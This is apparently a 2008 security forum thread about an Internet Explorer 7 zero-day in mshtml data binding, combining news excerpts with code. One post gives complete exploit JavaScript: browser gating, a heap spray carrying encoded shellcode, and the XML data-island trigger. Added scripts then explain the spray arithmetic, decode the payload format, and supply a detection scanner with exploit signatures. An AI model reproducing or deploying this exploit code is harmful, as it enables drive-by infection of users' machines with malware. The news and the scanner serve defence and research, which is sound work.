View full version: zero day exploit (fully-patched) IE 7


Fugitif
10.12.2008, 02:51
Security researchers are reporting in-the-wild attacks targeting a previously unknown vulnerability in fully patched versions of Microsoft's Internet Explorer browser.

Internet users located in China report infections that result when using IE 7 to browse booby-trapped websites. Researchers from McAfee investigated the matter and found the exploits successfully target the Microsoft browser on both Windows XP Service Pack 3 and Vista SP 1.

The exploits contain shellcode that installs the Downloader-AZN, a well-known trojan that hijacks a PC's configuration settings and downloads additional pieces of malware. Anti-virus software from McAfee, and presumably other companies, detects the trojan - though at the time of writing, it appeared they didn't yet detect the zero-day exploit itself.

The attacks target a flaw in the way IE handles certain types of data that use the extensible markup language, or XML, format. The bug references already freed memory in the mshtml.dll file. According to IDG News, exploits work about one in three times, and only after a victim has visited a website that serves a malicious piece of javascript.

Microsoft researchers are looking into the reports, a company spokesman said.

The reports came just hours ahead of Patch Tuesday, Microsoft's monthly release of security updates. The patches include a cumulative update for IE.

Source (http://www.theregister.co.uk/2008/12/09/zero_day_ie_flaw_exploited/)

BlackSun
11.12.2008, 10:24
<script language="javascript">
// Bail out unless the user agent is IE 7; anything else is sent to about:blank.
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

// Busy-wait for the given number of milliseconds (no setTimeout), so the
// spray below has finished before the trigger is written into the page.
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}

// Heap spray: fill the heap with ~1 MB strings, each a sled of 0x0a0a code
// units followed by the shellcode, so that the value 0x0a0a0a0a both points
// into sprayed memory and lands inside a sled.
function spray(sc)
{
// "dadong" stands in for "%u" in the payload below. The whitespace inside the
// payload is forum line-wrapping; it has to be stripped before unescape(),
// otherwise each wrapped line inserts a stray space byte into the shellcode.
var infect=unescape(sc.replace(/\s+/g,"").replace(/dadong/g,"\x25\x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;               // bytes: JS strings are UTF-16
var szlong=heapBlockSize-(payLoadSize+0x038);  // sled size, leaving 0x38 bytes for the string header
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
var aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize; // number of 1 MB blocks up to 0x0a0a0a0a
zzchuck=new Array();                            // global on purpose: keeps the blocks alive
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}

// Grow retVal by doubling until it is at least szlong bytes long, then cut
// it to exactly szlong/2 code units (szlong bytes).
function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}

var a1="dadong";
spray(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824 dadong5858dadong3358dadongB3DBdadong031Cdadong31C3 dadong66C9dadongE981dadongFA65dadong3080dadong4021 dadongFAE2dadong17C9dadong2122dadong4921dadong0121 dadong2121dadong214BdadongF1DEdadong2198dadong2131 dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DE dadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121 dadongD9AAdadong19C9dadong2121dadongC921dadong206C dadong2121dadong67C9dadong2121dadongC921dadong22FA dadong2121dadongD9AAdadong03C9dadong2121dadongC921 dadong2065dadong2121dadong11C9dadong2121dadongC921 dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121 dadongC921dadong2040dadong2121dadong3BC9dadong2121 dadongCA21dadong7279dadongFDAAdadong4B72dadong4961 dadong3121dadong2121dadongC976dadong2390dadong2121 dadongC4C9dadong2121dadong7921dadong72E2dadongFDAA dadong4B72dadong4901dadong3121dadong2121dadongC976 dadong23B8dadong2121dadongECC9dadong2121dadong7921 dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9 dadong68E8dadongE112dadongE291dadongD3DDdadongAC8F dadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99 dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DE dadongC8E2dadong25B4dadong2121dadongA07Adadong35CD dadong2120dadongAA21dadong1FF5dadong23E6dadong4C42 dadong0145dadongE61Fdadong2563dadong420Edadong0301 dadongE3A2dadong1229dadong71E1dadong4971dadong2025 dadong2121dadong7273dadongC971dadong22E0dadong2121 dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29 dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7 dadong21E7dadong1203dadong1FF3dadong71A9dadongA220 dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2 dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1 dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231 dadong1FE1dadong62E6dadong200Ddadong2121dadong7021 dadong7172dadong7171dadong7171dadong7671dadongC971 dadong2218dadong2121dadong38C9dadong2121dadong4521 dadong2580dadong2121dadongAC21dadong4181dadongDEDE dadongC9DEdadong2216dadong2121dadongFA12dadong7272 
dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819 dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1 dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1 dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDE dadong3099dadong2520dadongE3A1dadong212Ddadong3AC9 dadongDEDEdadong12DEdadong71E1dadongC975dadong2175 dadong2121dadongC971dadong23AAdadong2121dadongF1DE dadongA117dadong051Ddadong5621dadongC92Bdadong2360 dadong2121dadongDE12dadongDE76dadongC9F1dadong20DA dadong2121dadongDE49dadong2121dadongDE21dadongC9F1 dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1 dadongC975dadong213Fdadong2121dadongC971dadong2374 dadong2121dadongF1DEdadongA117dadong051Ddadong5621 dadongC92Bdadong232Adadong2121dadongDE12dadongDE76 dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279 dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CD dadongDDAAdadong294Bdadong1F76dadong56DEdadongC935 dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049 dadong444Cdadong4921dadong6468dadong5367dadongD5AA dadong2998dadong2121dadongD221dadong5487dadong4B0E dadong1F21dadong55DEdadong0105dadong05C9dadong2123 dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121 dadongF1DEdadongD91Adadong2955dadongAA17dadong0565 dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93D dadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31 dadong997Fdadong2120dadong2121dadong49E2dadong4F4E dadong2121dadong5449dadong4D53dadongCA4CdadongAC34 dadong0565dadong7125dadong03C9dadongDEDFdadong71DE dadong6BC9dadong2123dadongC821dadongDFC3dadongDEDE dadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2 dadong494Ddadong554Fdadong4D45dadong34CAdadong65AC dadong2505dadongC971dadongDCDAdadongDEDEdadongC971 dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DE dadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249 dadong2113dadong4921dadong5254dadong5344dadong34CA dadong65ACdadong2505dadongC971dadongDCF0dadongDEDE dadongC971dadong20D8dadong2121dadongB0C8dadongDEDF dadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229 dadong4249dadong5657dadong4921dadong4952dadong4E45 
dadong34CAdadong65ACdadong2505dadongC971dadongDC86 dadongDEDEdadongC971dadong20EEdadong2121dadong46C8 dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2 dadongE229dadong5749dadong5946dadongCA21dadongAC34 dadong0565dadong7125dadongA3C9dadongDEDCdadong71DE dadong8BC9dadong2120dadongC821dadongDF63dadongDEDE dadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2 dadong208Adadong2121dadong3A49dadong67E7dadong7158 dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2 dadong20B6dadong2121dadongCD49dadong22B6dadong712D dadong93C9dadong2120dadongA221dadong29E5dadongC9E2 dadong20A2dadong2121dadong8B49dadong2CDDdadong715D dadongBFC9dadong2120dadongA221dadong29E5dadongC9E2 dadong204Edadong2121dadongCC49dadongCE77dadong7117 dadongABC9dadong2120dadongA221dadong29E5dadongC9E2 dadong207Adadong2121dadongD149dadong25ABdadong717E dadong57C9dadong2120dadongA221dadong29E5dadongC9E2 dadongDFD6dadongDEDEdadong5949dadongFA49dadong713D dadong43C9dadong2120dadongA221dadong29E5dadongC9E2 dadong2012dadong2121dadongCE49dadongC1EFdadong7141 dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2 dadong203Edadong2121dadong9149dadong0C68dadong71FA dadong1BC9dadong2120dadongA221dadong29E5dadongC9E2 dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713F dadong07C9dadong2120dadongA221dadong29E5dadongC9E2 dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123 dadong33C9dadong2120dadongA221dadong29E5dadongC9E2 dadong21C2dadong2121dadong5F49dadongC3F9dadong7152 dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2 dadong21EEdadong2121dadongBF49dadong9AD8dadong7114 dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2 dadongDFB3dadongDEDEdadong7649dadong9481dadong719A dadongF7C9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123 dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5 dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182 dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2 
dadongDF63dadongDEDEdadong4949dadongE405dadong7192 dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2 dadong2176dadong2121dadong5349dadong92DFdadong7137 dadong53C9dadong2121dadongA221dadong29E5dadongC9E2 dadongDF65dadongDEDEdadong32CAdadong444BdadongC971 dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDE dadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDE dadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECE dadong7124dadong1FC9dadong2121dadongA221dadong29E5 dadongC9E2dadong212Edadong2121dadongAF49dadong2F6F dadong71CDdadong0BC9dadong2121dadongA221dadong29E5 dadong12E2dadong45E1dadong61AAdadongA411dadong59E1 dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3D dadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AA dadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2 dadongAA17dadong054Ddadong1705dadong64AAdadong171D dadong75AAdadong5924dadongF422dadongAA1Fdadong396B dadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68 dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1 dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922 dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFE dadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2D dadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25 dadongE422dadongA817dadong0565dadong403DdadongC9E2 dadongDA47dadongDEDEdadong5549dadong5155dadong0E1B dadong560Edadong5656dadong430Fdadong4840dadong444A dadong0F42dadong4F42dadong450Edadong564Edadong0E4F dadong4E4Adadong440Fdadong4459dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong2121dadong2121dadong2121dadong2121dadong2121 dadong0021");

sleep(3000);

// Second gate: only write the trigger on IE 7 running on Windows XP or
// Server 2003, the platforms the shellcode is built for.
var nav=navigator.userAgent.toLowerCase();
var version;
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if(version==7)
{
var w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
var wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
// Trigger: an XML data island (ID=I) defined twice while a SPAN is bound to
// it through DATASRC/DATAFLD with DATAFORMATAS=HTML. Per the reports quoted
// above, this is the data-binding path in mshtml.dll that references freed
// memory. The U+0A0A characters in the image SRC are the same 0x0a0a pattern
// the spray fills memory with.
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>
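
The spray arithmetic in the post is easy to get wrong, so the following Node.js script is added here as a worked example (it is not part of BlackSun's post): it reproduces the block layout of spray()/getSampleValue() and checks where 0x0a0a0a0a falls inside a sprayed block. The 1 MB block size, the 0x38 header allowance and the "dadong" encoding are taken from the posted code; decodeShellcode, sprayLayout, checkPostedLayout and the two-word sample payload are constructed for illustration.

```javascript
// Added example, not code from the posted exploit: models the arithmetic
// behind spray()/getSampleValue() so the layout can be checked offline under
// Node.js. Function names and the sample payload are constructed.

// Decode the posted encoding: "dadong" stands in for "%u", embedded
// whitespace is forum line-wrapping, and each %uXXXX is one UTF-16 code unit
// that IE stores little-endian, so the low byte comes first in memory.
function decodeShellcode(encoded) {
  const escaped = encoded.replace(/\s+/g, "").replace(/dadong/g, "%u");
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g;
  const bytes = [];
  let consumed = 0;
  let m;
  while ((m = re.exec(escaped)) !== null) {
    if (m.index !== consumed) {
      throw new Error("unexpected text at offset " + consumed);
    }
    if (m[1] !== undefined) {
      const unit = parseInt(m[1], 16);
      bytes.push(unit & 0xff, unit >> 8);
    } else {
      bytes.push(parseInt(m[2], 16));
    }
    consumed = re.lastIndex;
  }
  if (consumed !== escaped.length) {
    throw new Error("trailing text at offset " + consumed);
  }
  return bytes;
}

// Reproduce the block layout of the posted spray: each string is sled +
// payload, sized so that the character data plus the 0x38-byte string header
// the posted code assumes fills one blockSize allocation. Report where the
// target address falls inside such a block and whether that is in the sled.
function sprayLayout(payloadBytes, opts = {}) {
  const blockSize = opts.blockSize ?? 0x100000;  // 1 MiB, as in the post
  const target = opts.target ?? 0x0a0a0a0a;      // the sprayed pointer value
  const header = opts.header ?? 0x38;            // string header overhead
  const sledBytes = blockSize - (payloadBytes + header);
  if (sledBytes <= 0) {
    throw new Error("payload does not fit in one block");
  }
  // for(i=0;i<aaablk;i++) with a non-integer bound runs ceil(aaablk) times.
  const blocks = Math.ceil((target - blockSize) / blockSize);
  const offsetInBlock = target % blockSize;
  return {
    sledBytes,
    sledChars: sledBytes / 2,
    blockBytes: sledBytes + payloadBytes,
    blocks,
    sprayMiB: (blocks * blockSize) / 0x100000,
    offsetInBlock,
    landsInSled: offsetInBlock < sledBytes,
  };
}

// Constructed sample in the posted encoding (two NOPs, then int3), with a
// line-wrap space as the forum inserted into the real payload.
const SAMPLE_PAYLOAD = "dadong9090 dadongCCCC";

function checkPostedLayout() {
  const sc = decodeShellcode(SAMPLE_PAYLOAD);
  return sprayLayout(sc.length);
}

console.log(checkPostedLayout());
```

Run it with node. The output shows that 0x0a0a0a0a sits at offset 0x0a0a0a into any 1 MiB-aligned block, far below the roughly 1 MiB sled, so wherever a block happens to start the sprayed pointer lands on sled bytes rather than on the shellcode; it also shows that the post's non-integer loop bound of 159.625 gives 160 iterations, about 160 MB of sprayed strings. Feeding the full payload from the post through decodeShellcode gives the real payload length for sprayLayout.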

Fugitif
13.12.2008, 06:42
Internet Explorer 6 and 8 also affected by zero-day vulnerability

Microsoft says Internet Explorer 5.01, 6 and 8 (beta) are also potentially susceptible to the zero-day exploit, published recently. Until now it had been assumed that only Internet Explorer 7 contained the vulnerability. However, no attacks on versions 6 and 8 have yet been observed. As a result of revising its security instructions for different versions, Microsoft has highlighted further measures users can take to defend their systems against attacks until a patch is provided.

Microsoft recommends that Data Execution Prevention (DEP) and memory protection be enabled in Internet Explorer 7 (Tools/Internet Options/Advanced/Enable memory protection...), but this can only be done in the browser itself in the 32-bit version of Vista. In the 64-bit version of Vista, DEP is automatically globally enabled. Configuring this option via browser settings is not a possibility under Windows XP. Instead, users have to activate DEP for the complete system via System/Advanced/Performance/Settings/Data Execution Prevention.

However, H. D. Moore has recently published a Metasploit module for the exploit. When tested by heise Security, this evaded Data Execution Prevention under both Windows XP SP2 and Vista, and ran injected code. In his module, Moore used the techniques published by Alexander Sotirov and Mark Dowd in mid-year.

Microsoft further recommends that the Internet zone security setting be set to "High", and that access to the oledb32.dll library be prevented. This, it says, is the most reliable protection at present. The Microsoft Security Advisory gives full instructions for each operating system.

The Internet Storm Center meanwhile reports that the exploit appears to be foisted on harmless web sites by SQL injection. Since the exploit code has been known for some days, it is likely that such attacks will shortly multiply. Administrators should keep an eye on their servers in the next few weeks and check their logs for this kind of suspicious activity.

Danish security company Secunia says in its blog that this is not a problem with XML, as at first thought, but with data binding.

Source (http://www.heise-online.co.uk/security/Internet-Explorer-6-and-8-also-affected-by-zero-day-vulnerability--/news/112240)

so IE sucks anyway :)
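
The ISC note quoted above says the exploit was being planted on harmless sites via SQL injection, and the Register piece says the AV vendors detected the trojan but not the exploit page itself. As an added example (not from the thread or the articles it quotes), here is a small indicator-based scanner in Node.js that a site operator could run over served HTML or stored page content to spot the shape of this attack: the XML data island bound to a SPAN through DATASRC/DATAFLD, the %u0a0a sled, a long unescape()'d %u string, the IE 7 gate and a remote script include. The indicator names, weights, threshold and both sample pages are constructed for illustration.

```javascript
// Added example, not from the thread or the articles it quotes: a scoring
// scanner for served pages or stored content that looks for the exploit
// shape described in the thread. Indicators, weights, threshold and the two
// sample pages are constructed.

const INDICATORS = [
  // The trigger: an XML data island plus a SPAN bound to it with
  // DATASRC/DATAFLD and DATAFORMATAS=HTML (the data-binding path Secunia names).
  { name: "xml-island-bound-to-span", weight: 3,
    test: s => /<XML\s+ID=\w+>/i.test(s)
            && /<SPAN[^>]*DATASRC=#\w+[^>]*DATAFLD=\w+[^>]*DATAFORMATAS=HTML/i.test(s) },
  { name: "cdata-image-src-in-island", weight: 2,
    test: s => /<!\[CDATA\[<image\s+SRC=/i.test(s) },
  // The sled pattern the posted spray builds around its 0x0a0a0a0a address.
  { name: "unicode-escaped-0a0a-sled", weight: 3,
    test: s => /(%u0a0a){2,}/i.test(s) },
  // unescape() over a long run of %uXXXX words is the usual shellcode carrier.
  { name: "unescape-of-long-percent-u-string", weight: 2,
    test: s => /unescape\s*\(/i.test(s) && (s.match(/%u[0-9a-f]{4}/gi) || []).length >= 64 },
  // Weak on its own: plenty of legitimate pages sniff for IE 7.
  { name: "ie7-user-agent-gate", weight: 1,
    test: s => /userAgent[^;]*indexOf\(\s*["']msie 7["']/i.test(s) },
  // What SQL injection into page content typically leaves behind.
  { name: "remote-script-include", weight: 1,
    test: s => /<script[^>]+src=["']?https?:\/\/[^"'>\s]+\.js["']?[^>]*>\s*<\/script>/i.test(s) },
];

const FLAG_THRESHOLD = 5; // constructed: the structural trigger alone is not enough

function scanPage(body) {
  const hits = INDICATORS.filter(ind => ind.test(body));
  const score = hits.reduce((sum, ind) => sum + ind.weight, 0);
  return {
    score,
    hits: hits.map(ind => ind.name),
    flagged: score >= FLAG_THRESHOLD,
  };
}

// Constructed sample: a legitimate page that happens to sniff for IE 7.
const BENIGN_PAGE = '<html><body><script>' +
  'if(navigator.userAgent.indexOf("MSIE 7")!=-1){document.getElementById("hint").style.display="block";}' +
  '</script><span id="hint">Please upgrade your browser</span></body></html>';

// Constructed sample: the same page after injection of the exploit shape from
// the thread (gate, sled, spray string, island, binding, remote include). The
// URLs are placeholders and the "shellcode" is NOPs only.
const INJECTED_PAGE = BENIGN_PAGE.replace('</body>',
  '<script language="javascript">' +
  'if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");' +
  'var sled=unescape("%u0a0a%u0a0a");' +
  'var sc=unescape("' + '%u9090'.repeat(80) + '");' +
  "document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://example.invalid/x]]></C></X></xml>" +
  "<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');" +
  '</script><script src="http://example.invalid/inject.js"></script></body>');

console.log(scanPage(BENIGN_PAGE));
console.log(scanPage(INJECTED_PAGE));
```

The IE 7 sniff scores 1 on its own, so the benign page is not flagged, while the injected page trips every indicator. The data-binding indicator carries the most weight because, as Secunia noted, the bug is in data binding rather than XML, and that markup has no business in a normal page. Note that the posted payload hides "%u" behind the "dadong" token, so a literal %u signature only catches the sled line; content that substitutes the escape prefix needs the token rewritten first, which is why the structural island/binding indicator is the one to rely on.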